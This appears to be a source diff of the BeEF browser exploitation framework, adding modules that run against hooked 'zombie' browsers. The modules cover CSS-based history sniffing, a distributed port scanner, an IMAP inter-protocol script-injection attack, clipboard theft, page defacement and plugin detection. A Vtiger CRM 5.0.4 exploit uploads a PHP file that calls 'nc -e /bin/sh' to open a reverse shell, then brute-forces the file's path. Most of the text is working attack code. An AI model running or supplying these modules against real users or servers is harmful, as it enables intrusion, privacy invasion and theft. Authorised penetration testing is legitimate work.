yahoo.co.jp
orkut.com
rapidshare.com
baidu.com
microsoft.com
google.co.in
google.de
qq.com
ebay.com
hi5.com
google.fr
aol.com
mail.ru
google.co.uk
sina.com.cn
fc2.com
photobucket.com
google.com.br
amazon.com
imdb.com
vkontakte.ru
google.it
google.es
google.cn
imageshack.us
youporn.com
wordpress.com
google.co.jp
yandex.ru
flickr.com
friendster.com
skyrock.com
adultfriendfinder.com
go.com
odnoklassniki.ru
google.com.mx
bbc.co.uk
craigslist.org
dailymotion.com
redtube.com
cnn.com
163.com
mininova.org
googlesyndication.com
taobao.com
google.ca
livejournal.com
fotolog.net
uol.com.br
imagevenue.com
ebay.de
naver.com
mixi.jp
rakuten.co.jp
rambler.ru
espn.go.com
free.fr
livedoor.com
rediff.com
nicovideo.jp
adobe.com
sohu.com
apple.com
56.com
yourfilehost.com
veoh.com
perfspot.com
deviantart.com
about.com
google.com.tr
youku.com
globo.com
megaupload.com
google.pl
metroflog.com
google.ru
fastclick.com
clicksor.com
geocities.com
goo.ne.jp
google.co.id
ebay.co.uk
mediafire.com
yahoo.com.cn
partypoker.com
gamespot.com
download.com
nytimes.com
google.com.au
terra.com.br
wretch.cc
weather.com
thepiratebay.org
ign.com
bebo.com
depositfiles.com
google.com.sa
ask.com
nasza-klasa.pl
adultadworld.com
nba.com
google.com.ar
ameblo.jp
zshare.net
tudou.com
digg.com
google.nl
amazon.co.jp
4shared.com
aim.com
netlog.com
2ch.net
infoseek.co.jp
studiverzeichnis.com
isohunt.com
comcast.net
doubleclick.com
nifty.com
daum.net
sourceforge.net
usercash.com
geocities.jp
mop.com
badongo.com
cnet.com
onet.pl
google.co.th
easy-share.com
pornhub.com
megarotic.com
imeem.com
gmx.net
dell.com
ig.com.br
orange.fr
xunlei.com
metacafe.com
reference.com
biglobe.ne.jp
sakura.ne.jp
information.com
homeway.com.cn
multiply.com
888.com
livejasmin.com
zol.com.cn
realitykings.com
torrentz.com
libero.it
narod.ru
web.de
google.co.za
soso.com
mozilla.com
amazon.de
filefactory.com
ebay.it
google.com.eg
icq.com
brazzers.com
google.co.ve
allegro.pl
ucoz.ru
anonym.to
tinypic.com
alice.it
blogfa.com
vnexpress.net
wp.pl
wikimedia.org
hp.com
maktoob.com
mapquest.com
google.com.co
typepad.com
invisionfree.com
paypopup.com
mercadolibre.com.mx
schuelervz.net
sendspace.com
google.com.pk
ebay.fr
spiegel.de
hatena.ne.jp
google.be
seznam.cz
linkedin.com
answers.com
mercadolivre.com.br
xtube.com
dtiblog.com
dada.net
miniclip.com
xvideos.com
megaclick.com
softonic.com
bangbros1.com
adsrevenue.net
cricinfo.com
zedo.com
freewebs.com
hyves.nl
alibaba.com
xnxx.com
worldofwarcraft.com
bankofamerica.com
files.wordpress.com
badoo.com
hao123.com
filefront.com
google.com.pe
google.cl
google.com.vn
gamefaqs.com
seesaa.net
gougou.com
china.com
xanga.com
kooora.com
tom.com
google.gr
altervista.org
amazon.co.uk
zaycev.net
ocn.ne.jp
taringa.net
cyworld.com
indiatimes.com
ziddu.com
soufun.com
rapidshare.de
google.at
slide.com
bestbuy.com
tripod.com
liveinternet.ru
jugem.jp
flurl.com
fanfiction.net
thottbot.com
google.se
wwe.com
softpedia.com
pcpop.com
break.com
google.ch
chase.com
aebn.net
reuters.com
smileycentral.com
megavideo.com
marca.com
fling.com
eastmoney.com
debonairblog.com
altavista.com
xboard.us
freeones.com
myfreepaysite.com
netflix.com
google.ro
technorati.com
pchome.net
gametrailers.com
livescore.com
payserve.com
sonico.com
symantec.com
tagged.com
webshots.com
fotka.pl
google.com.my
last.fm
pornotube.com
ifolder.ru
tianya.cn
mozilla.org
archive.org
google.pt
gaiaonline.com
kaskus.us
target.com
yaplog.jp
21cn.com
walmart.com
tv.com
foxsports.com
dantri.com.vn
sogou.com
disney.go.com
ultimate-guitar.com
brazzersnetwork.com
uwants.com
ku6.com
dmm.co.jp
interia.pl
126.com
playstation.com
newgrounds.com
neopets.com
bangbros.com
runescape.com
xinhuanet.com
videosz.com
exblog.jp
foxnews.com
mywebsearch.com
istockphoto.com
elmundo.es
cocolog-nifty.com
nih.gov
newegg.com
skype.com
naukri.com
zango.com
match.com
shopping.com
sexyono.com
tu.tv
verycd.com
imagefap.com
blogchina.com
usps.com
att.com
yimg.com
wow-europe.com
mtv.com
washingtonpost.com
att.net
stumbleupon.com
cmfu.com
google.co.hu
milliyet.com.tr
esnips.com
forbes.com
livedoor.biz
vagos.es
wikia.com
engadget.com
leo.org
hurriyet.com.tr
porndirt.com
real.com
google.com.ph
monster.com
careerbuilder.com
over-blog.com
it168.com
letitbit.net
duowan.com
conduit.com
mobile9.com
mediaplex.com
clicksor.net
excite.co.jp
linternaute.com
hornymatches.com
wowhead.com
googlepages.com
startimes2.com
ebay.com.au
1und1.de
myvideo.de
rmxads.com
wamu.com
ups.com
meebo.com
jeuxvideo.com
no-ip.com
petardas.com
iwiw.hu
repubblica.it
dion.ne.jp
adult-empire.com
discuss.com.hk
msn.ca
vmn.net
so-net.ne.jp
starware.com
xbox.com
watch-movies.net
t-online.de
torrentreactor.net
utorrent.com
pornaccess.com
89.com
freelotto.com
univision.com
guardian.co.uk
btjunkie.org
rr.com
google.ae
verizon.net
teacup.com
mercadolibre.com.ar
expedia.com
forumfree.net
corriere.it
6park.com
ameba.jp
people.com.cn
mlb.com
shinobi.jp
minijuegos.com
ezinearticles.com
msplinks.com
xiaonei.com
pogo.com
iij4u.or.jp
forumcommunity.net
01net.com
ibm.com
dyndns.org
mynet.com
yam.com
google.com.ua
squidoo.com
mobile.de
google.dk
4chan.org
flixster.com
godaddy.com
wordreference.com
rude.com
110mb.com
bramjnet.com
people.com
sparkstudios.net
nokia.com
sapo.pt
zedge.net
wowarmory.com
chinaren.com
warez-bb.org
circuitcity.com
torrentz.ws
sify.com
thefreedictionary.com
nnm.ru
aweber.com
google.fi
moneycontrol.com
bild.de
commentcamarche.net
addictinggames.com
perezhilton.com
plala.or.jp
bharatstudent.com
tradedoubler.com
ifeng.com
ikea.com
kakaku.com
torrents.ru
crunchyroll.com
cartoonnetwork.com
google.com.tw
pchome.com.tw
allocine.fr
xhamster.com
wsj.com
vietnamnet.vn
hattrick.org
onemanga.com
abcnews.go.com
myway.com
juggcrew.com
spankwire.com
sweetim.com
dealtime.com
musica.com
atwiki.jp
marketgid.com
stage6.com
gyao.jp
fc2web.com
leonardo.it
whenu.com
zylom.com
buzznet.com
google.com.sg
adbrite.com
slickdeals.net
ebay.es
mforos.com
truveo.com
bangbrosnetwork.com
wannawatch.com
google.ie
www.twitter.com
twitter.com
www.myspace.com
www.facebook.com
www.slashdot.org
slashdot.org
www.livejournal.com
livejournal.com
blogger.com
www.blogger.com
gather.com
www.gather.com
ziggs.com
www.ziggs.com
plaxo.com
www.plaxo.com
www.care2.com
care.com
xing.com
www.xing.com
www.linkedin.com
linkedin.com
www.ryze.com
ryze.com
ecademy.com
www.ecademy.com
www.careerbuilder.com
careerbuilder.com
www.monster.com
monster.com
</textarea>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>
</body>
</html>

1
modules/network/detect_visited_urls/name.txt Normal file
View File

@@ -0,0 +1 @@
Detect Visited URLs

8
modules/network/detect_visited_urls/search.txt Normal file
View File

@@ -0,0 +1,8 @@
www.yahoo.com
yahoo.com
www.google.com
google.com
adwords.google.com
gmail.com
www.gmail.com
gmail.google.com

41
modules/network/detect_visited_urls/sites.txt Normal file
View File

@@ -0,0 +1,41 @@
adwords.google.com
blogger.com
care.com
careerbuilder.com
ecademy.com
facebook.com
gather.com
gmail.com
gmail.google.com
google.com
linkedin.com
livejournal.com
monster.com
myspace.com
plaxo.com
ryze.com
slashdot.org
twitter.com
www.blogger.com
www.care2.com
www.careerbuilder.com
www.ecademy.com
www.facebook.com
www.gather.com
www.gmail.com
www.google.com
www.linkedin.com
www.livejournal.com
www.monster.com
www.myspace.com
www.plaxo.com
www.ryze.com
www.slashdot.org
www.twitter.com
www.xing.com
www.yahoo.com
www.ziggs.com
xing.com
yahoo.com
ziggs.com

33
modules/network/detect_visited_urls/social.txt Normal file
View File

@@ -0,0 +1,33 @@
www.twitter.com
twitter.com
www.myspace.com
myspace.com
www.facebook.com
facebook.com
www.slashdot.org
slashdot.org
www.livejournal.com
livejournal.com
blogger.com
www.blogger.com
gather.com
www.gather.com
ziggs.com
www.ziggs.com
plaxo.com
www.plaxo.com
www.care2.com
care.com
xing.com
www.xing.com
www.linkedin.com
linkedin.com
www.ryze.com
ryze.com
ecademy.com
www.ecademy.com
www.careerbuilder.com
careerbuilder.com
www.monster.com
monster.com

57
modules/network/detect_visited_urls/template.js Normal file
View File

@@ -0,0 +1,57 @@
function get_content(f){
return (f.contentDocument) ? f.contentDocument : f.contentWindow.document;
}
function is_visited(l){
var dummy = document.getElementById("HIDDEN_FRAME");
if (!dummy){
dummy = document.createElement("iframe");
dummy.style.visibility = "hidden";
dummy.id = "HIDDEN_FRAME";
document.body.appendChild(dummy);
var dummycontent = get_content(dummy);
var style = "<style>a:visited{width:0px};</style>";
dummycontent.open();
dummycontent.write(style);
dummycontent.close();
} else {
var dummycontent = get_content(dummy);
}
var dummylink = dummycontent.createElement("a");
dummylink.href = l;
dummycontent.body.appendChild(dummylink);
if (dummylink.currentStyle) {
visited = dummylink.currentStyle["width"];
} else {
visited = dummycontent.defaultView.getComputedStyle(dummylink, null).getPropertyValue("width");
}
return (visited == "0px");
}
function check_list(rawurls) {
var result = "The browser has visited:";
var found = false;
var urllist = rawurls.split(/!/);
for (var i=0; i < urllist.length; i++) {
if(is_visited('http://' + urllist[i])) {
result += String.fromCharCode(10);
result += 'http://' + urllist[i];
found = true;
}
}
if(!found) {
result += String.fromCharCode(10);
result += "none found";
}
return result;
}
return_result(result_id, check_list('RAWURLS'));

97
modules/network/distributed_port_scanner/index.php Normal file
View File

@@ -0,0 +1,97 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
session_start();
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
// set results file variables
$results_file = MODULE_TMP_DIR . md5(getcwd());
$rand = md5(rand());
$_SESSION[md5(getcwd())] = $rand;
$_SESSION[$rand] = md5(getcwd());
?>
<script>
// show module results section
new Element.show('module_results');
<?
// set javascript variables and update modules results section
$tmp = md5(getcwd());
echo "result_id = '" . $_SESSION[$tmp] . "';\n";
echo "mod.id = '" . $_SESSION[$tmp] . "';\n";
echo "mod.heartbeat();\n";
?>
Element.Methods.construct_code = function() {
var i = 0;
var port_pos = 0;
var b64code_template = '<? echo get_b64_file(JS_FILE); ?>';
zl.selected_zombies.each( function(id){
b64code = b64replace(b64code_template, "TARGET", document.myform.target_.value);
b64code = b64replace(b64code, "TIMEOUT", document.myform.timeout.value);
// construct/split ports
port_str = document.myform.ports.value;
port_arr = port_str.split(',');
zombie_num = zl.selected_zombies.length;
port_num = port_arr.length;
port_str = "";
max = (port_num/zombie_num) * (i+1);
for(var j=port_pos; j<max; j++, port_pos++) {
if(port_str != "") port_str += ',';
port_str += port_arr[j];
}
i++;
// if ports then send port scanner code
if(port_str != "") {
b64code = b64replace(b64code, "PORTS", port_str);
var params = 'data=' + b64code;
new Ajax.Updater('module_status', 'send_cmds.php?action=cmd&result_id=' + result_id + '&zombie=' + id, {method:'post',parameters:params,asynchronous:false});
}
});
if(i == 0) {
// no zombies selected
beef_error('No Zombie Selected. Select Zombie(s)');
}
}
// add construct code to DOM
Element.addMethods();
</script>
<div id="module_header">Distributed Port Scanner</div>
<div class="entry">
This module will send a subset of the ports to scan to each selected zombie browser. The
timeout parameter may need adjusting depending upon network latency.<br><br>
Web browsers explictly (programmatically) prohibit connection to some ports. The results
of these ports are indeterminate. For a full list please refer to
the <a href=http://www.mozilla.org/projects/netlib/PortBanning.html>mozilla</a> page.
</div>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Target</div>
<input type="text" name="target_" value="www.google.com"/>
<div id="module_subsection_header">Port(s)</div>
<input type="text" name="ports" value="80,220,8080"/>
<div id="module_subsection_header">Timeout</div>
<input type="text" name="timeout" value="1500"/>
<input class="button" type="button" value="Scan" onClick="javascript:construct_code()"/>
</form>
</div>

1
modules/network/distributed_port_scanner/name.txt Normal file
View File

@@ -0,0 +1 @@
Distributed Port Scanner

46
modules/network/distributed_port_scanner/template.js Normal file
View File

@@ -0,0 +1,46 @@
var AttackAPI = {
version: '0.1',
author: 'Petko Petkov (architect)',
homepage: 'http://www.gnucitizen.org'};
AttackAPI.PortScanner = {};
AttackAPI.PortScanner.scanPort = function (callback, target, port, timeout) {
var timeout = (timeout == null)?100:timeout;
var img = new Image();
img.onerror = function () {
if (!img) return;
img = undefined;
callback(target, port, 'open');
};
img.onload = img.onerror;
img.src = 'http://' + target + ':' + port;
setTimeout(function () {
if (!img) return;
img = undefined;
callback(target, port, 'closed');
}, timeout);
};
AttackAPI.PortScanner.scanTarget = function (callback, target, ports_str, timeout)
{
var ports = ports_str.split(",");
for (index = 0; index < ports.length; index++) {
AttackAPI.PortScanner.scanPort(callback, target, ports[index], timeout);
}
};
function do_main(){
var result = "";
var callback = function (target, port, status) {
result = target + ":" + port + " " + status;
return_result(result_id, result);
};
AttackAPI.PortScanner.scanTarget(callback, "TARGET", "PORTS", TIMEOUT);
}
do_main()

55
modules/network/imap_ipc/index.php Normal file
View File

@@ -0,0 +1,55 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
var rtnval = "OK Clicked";
Element.Methods.construct_code = function() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
var temp_cmds = document.myform.cmd_str.value;
temp_cmds = temp_cmds.replace(/\n/g, "\\\\n")
// replace sections of the code with user input
b64code = b64replace(b64code, "IP_ADDRESS", document.myform.ip_str.value);
b64code = b64replace(b64code, "COMMAND", temp_cmds);
// send the code to the zombies
do_send(b64code);
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Inter-protocol Communication: IMAP4 </div>
<div class="entry">
Using <a href=http://www.bindshell.net/papers/ipc>Inter-protocol Communication</a> the
zombie browser will send commands to an IMap4 server. The target address can be
on the zombie's subnet which is potentially not directly accessible from the Internet.
</div>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Target Address</div>
<input type="text" name="ip_str" value="localhost"/>
<div id="module_subsection_header">Commands</div>
<textarea name="cmd_str" rows="5" cols="80">a001 CAPABILITY
a01 login root password
a002 logout</textarea>
<input class="button" type="button" value=" Send Now " onClick="javascript:construct_code()"/>
</form>
</div>
</div>

1
modules/network/imap_ipc/name.txt Normal file
View File

@@ -0,0 +1 @@
IMap4 IPC

74
modules/network/imap_ipc/template.js Normal file
View File

@@ -0,0 +1,74 @@
var target_ip = 'IP_ADDRESS';
var target_port = '220';
var payload = "";
var scr_l = '<scr' + 'ipt\>';
var scr_r = '</scr' + 'ipt>';
var max_line_len = 23;
function add_line(cmd) {
payload += scr_l + cmd + scr_r + "\\\n";
}
function construct_js(js) {
add_line("a=''");
js = js.replace(/ /g, "SP")
for(i=0; i<js.length; i+=max_line_len) {
add_line("a+=\\\""+js.substring(i,i+max_line_len)+"\\\"");
}
add_line("s=String.fromCharCode(0x20)");
add_line("a=a.replace(/SP/g,s)");
}
var code = "";
function add_js(js) {
code+=js+";";
}
add_js("var result_id='" + result_id + "'");
add_js("function include(script_filename) {");
add_js("var html_doc = document.getElementsByTagName('head').item(0);");
add_js("var js = document.createElement('script');");
add_js("js.src = script_filename;");
add_js("js.type = 'text/javascript';");
add_js("js.defer = true;");
add_js("html_doc.appendChild(js);");
add_js("return js;");
add_js("}");
add_js("include('" + beef_url + "' + '/hook/ipc_imap.js.php');");
construct_js(code);
add_line("eval(a)");
add_line("//__END__");
payload += "COMMAND";
var iframe = document.createElement("iframe");
iframe.setAttribute("id","iwindow");
//iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
function do_submit(ip, port, content) {
myform=document.createElement("form");
myform.setAttribute("name","data");
myform.setAttribute("method","post");
myform.setAttribute("enctype", "multipart/form-data");
myform.setAttribute("action","http://" + ip +
":" + port + "/abc.html");
document.getElementById("iwindow").contentWindow.document.body.appendChild(myform);
myExt = document.createElement("INPUT");
myExt.setAttribute("id","extNo");
myExt.setAttribute("name","test");
myExt.setAttribute("value",content);
myform.appendChild(myExt);
myform.submit();
}
do_submit(target_ip, target_port, payload);

76
modules/network/vtiger_crm_upload_exploit/index.php Normal file
View File

@@ -0,0 +1,76 @@
<?
// VtigerCRM <= 5.0.4 "chained exploitation" PoC
// Hacked up for OWASP New Zealand Day, July 13th 2009
//
// Thanks for the BeEF Wade :)
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
// Where did our file end up?
// Example /storage/2009/June/week3/<file>:
$year = date("Y");
$month = date("F");
$weekNum = date("W") - date("W",strtotime(date("Y-m-01"))) + 1;
$path = "/storage/$year/$month/week$weekNum/"
?>
<script>
var rtnval = "vtiger exploit sent";
function get_b64_code_vtiger() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "ATTACKURL", document.myform.vtiger_url.value);
b64code = b64replace(b64code, "FILEPATH", document.myform.vtiger_filepath.value);
b64code = b64replace(b64code, "CONNECTHOST", document.myform.vtiger_host.value);
b64code = b64replace(b64code, "CONNECTPORT", document.myform.vtiger_port.value);
b64code = b64replace(b64code, "RTN", rtnval);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Vtiger CRM Upload Exploit', get_b64_code_vtiger());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_vtiger());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Vtiger CRM Upload Exploit</div>
This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability
which is exploited is the in the CRM <a href="http://www.vtiger.com/">vtiger 5.0.4</a>.<br><br>
Start the listener on the host:
<pre>
nc -nvlp 8888
</pre>
<div id="module_subsection">
<form name="myform">
Target Web Server
<input type="text" name="vtiger_url" value="http://localhost/vtigercrm"/>
Target Directory
<input type="text" name="vtiger_filepath" value="<?php echo $path;?>"/>
Reverse Bindshell Host
<input type="text" name="vtiger_host" value="localhost"/>
Reverse Bindshell Port
<input type="text" name="vtiger_port" value="8888"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

2
modules/network/vtiger_crm_upload_exploit/name.txt Normal file
View File

@@ -0,0 +1,2 @@
Vtiger CRM Upload Exploit

161
modules/network/vtiger_crm_upload_exploit/template.js Normal file
View File

@@ -0,0 +1,161 @@
// VtigerCRM <= 5.0.4 "chained exploitation" PoC
// Hacked up for OWASP New Zealand Day, July 13th 2009
//
// Thanks for the BeEF Wade :)
// http://site/vtigercrm//
baseurl = "ATTACKURL";
function do_upload(){
// start AJAX file upload in 1 second
window.setTimeout("ajax_upload()", 1000);
}
// In a nutshell:
//
// 1) build url
// 2) construct the request object
// 3) POST the form
// 4) once requestdone, call do_callfile()
function ajax_upload(){
// Setup the AJAX POST
var targeturl = baseurl + '/index.php?module=uploads&action=add2db&return_module=Home&return_action=index';
var binary;
var filename;
var mytext;
http_request = false;
http_request = new XMLHttpRequest();
if (!http_request) {
// fail silently!
return false;
}
//prepare the POST
var boundaryString = 'PWNED';
var boundary = '-----------------------------PWNED';
var requestbody =
boundary + '\\n'
+ 'Content-Disposition: form-data; name="MAX_FILE_SIZE"' + '\\n'
+ '\\n'
+ 3000000 + '\\n'
+ boundary
+ '\\n'
+ 'Content-Disposition: form-data; name="return_module"' + '\\n'
+ '\\n'
+ '\\n'
+ boundary
+ '\\n'
+ 'Content-Disposition: form-data; name="return_action"' + '\\n'
+ '\\n'
+ '\\n'
+ boundary
+ '\\n'
+ 'Content-Disposition: form-data; name="return_id"' + '\\n'
+ '\\n'
+ '\\n'
+ boundary
+ '\\n'
+ 'Content-Disposition: form-data; name="uploadsubject"' + '\\n'
+ '\\n'
+ '\\n'
+ boundary
+ '\\n'
+ 'Content-Disposition: form-data; name="filename"; filename="vtiger-fun.PHP"' + '\\n'
+ 'Content-Type: application/x-httpd-php' + '\\n'
+ '\\n'
+ '<\?php' + '\\n'
+ 'passthru("/bin/nc -e /bin/sh CONNECTHOST CONNECTPORT");' + '\\n'
+ '\?>' + '\\n'
+ '\\n'
+ boundary
+ '\\n'
+ 'Content-Disposition: form-data; name="filename_hidden"' + '\\n'
+ '\\n'
+ 'vtiger-fun.PHP'
+ '\\n'
+ boundary
+ '\\n'
+ 'Content-Disposition: form-data; name="txtDescription"' + '\\\n'
+ '\\n'
+ 'drop it like its hot' + '\\n'
+ boundary
+ '\\n'
+ 'Content-Disposition: form-data; name="save"' + '\\n'
+ '\\n'
+ 'Attach' + '\\n'
+ boundary;
http_request.onreadystatechange = requestdone;
http_request.open('POST', targeturl, true);
http_request.setRequestHeader("Content-type", "multipart/form-data; boundary=---------------------------PWNED");
http_request.setRequestHeader("Content-length", requestbody.length);
http_request.send(requestbody);
}
// ajax call done... File uploaded? :)
function requestdone() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
result = http_request.responseText;
// find our file
do_callfile();
} else {
// fail silently
}
}
}
function requestfile() {
if (http_request.readyState == 4) {
if (http_request.status == 200) {
result = http_request.responseText;
} else {
// fail silently
}
}
}
// find our file :)
//
// Dirty brute force
function do_callfile(){
var i=0;
for (i=0;i<=1000;i++)
{
http_request = false;
http_request = new XMLHttpRequest();
if (!http_request) {
// fail silently!
return false;
}
var findurl = baseurl + "FILEPATH" + i + "_vtiger-fun.PHP";
var requestbody = "birds of a feather flock together";
http_request.onreadystatechange = requestfile;
http_request.open('POST', findurl, true);
http_request.setRequestHeader("Content-length", requestbody.length);
http_request.send(requestbody);
}
}
// Add your clean up routine here.
function do_cleanup() {
//document.write("Maybe your security team should check out owasp.org? ;)");
}
// Try the upload
function do_main(){
do_upload();
}
// Run the sploit
do_main();
do_cleanup();
return_result(result_id, "RTN");

45
modules/standard/alert_dialog/index.php Normal file
View File

@@ -0,0 +1,45 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
get_b64_code_alert = function () {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "ALERTSTRING", document.myform.alert_str.value);
b64code = b64replace(b64code, "RTN", "Alert Clicked");
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Alert Dialog', get_b64_code_alert());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_alert());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Alert Dialog</div>
This module will display an alert dialog in the selected zombie browsers.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">String</div>
<input type="text" width="90%" name="alert_str" value="BeEF Alert Dialog"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/standard/alert_dialog/name.txt Normal file
View File

@@ -0,0 +1 @@
Alert Dialog

6
modules/standard/alert_dialog/template.js Normal file
View File

@@ -0,0 +1,6 @@
function do_main(){
alert("ALERTSTRING");
}
do_main();
return_result(result_id, "RTN");

42
modules/standard/clipboard_theft/index.php Normal file
View File

@@ -0,0 +1,42 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_cb() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Clipboard Theft', get_b64_code_cb());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_cb());
}
// add construct code to DOM
Element.addMethods();
</script>
<div id="module_header">Clipboard Theft</div>
This module will work automatically with Internet Explorer browsers before 7.x. In later
versions of Internet Explorer, the browser will prompt the user and ask for permission to
access the clipboard. <br><br>
<div id="module_subsection">
<form>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/standard/clipboard_theft/name.txt Normal file
View File

@@ -0,0 +1 @@
Clipboard Theft

2
modules/standard/clipboard_theft/template.js Normal file
View File

@@ -0,0 +1,2 @@
return_result(result_id, clipboardData.getData("Text"));

45
modules/standard/deface_web_page/index.php Normal file
View File

@@ -0,0 +1,45 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_deface() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "HTMLCONTENT", document.myform.deface_str.value);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Deface Web Page', get_b64_code_deface());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_deface());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Deface Web Page</div>
This module will overwrite the content of the selected zombies with the value entered in the
'Deface String' input. <br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Deface String</div>
<input type="text" name="deface_str" value="BeEF Deface Web Page"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/standard/deface_web_page/name.txt Normal file
View File

@@ -0,0 +1 @@
Deface Web Page

7
modules/standard/deface_web_page/template.js Normal file
View File

@@ -0,0 +1,7 @@
function do_main(){
document.body.innerHTML = "HTMLCONTENT";
}
do_main();
return_result(result_id, "Site defaced");

41
modules/standard/detect_flash/index.php Normal file
View File

@@ -0,0 +1,41 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_fe() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Detech Flash', get_b64_code_fe());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_fe());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Detect Flash</div>
This module will detect if Adobe Flash Player is available in the selected zombie browsers.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header"></div>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/standard/detect_flash/name.txt Normal file
View File

@@ -0,0 +1 @@
Detect Flash

13
modules/standard/detect_flash/template.js Normal file
View File

@@ -0,0 +1,13 @@
function do_main(){
if (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]) {
result = "Flash is available in browser";
} else {
result = "Flash is NOT available in browser";
}
}
var result = null;
do_main();
return_result(result_id, result);

42
modules/standard/detect_java/index.php Normal file
View File

@@ -0,0 +1,42 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_je() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Detect Java', get_b64_code_je());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_je());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Detect Java</div>
This module will detect if Java is available in the selected zombie browsers.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header"></div>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/standard/detect_java/name.txt Normal file
View File

@@ -0,0 +1 @@
Detect Java

17
modules/standard/detect_java/template.js Normal file
View File

@@ -0,0 +1,17 @@
function do_main(){
// https://developer.mozilla.org/en/DOM/window.navigator.javaEnabled
// bug in XP SP2
if( window.navigator.javaEnabled() ) {
result = "Java is available in browser";
} else {
result = "Java is NOT available in browser";
}
}
var result = null;
do_main();
return_result(result_id, result);

41
modules/standard/detect_plugins/index.php Normal file
View File

@@ -0,0 +1,41 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
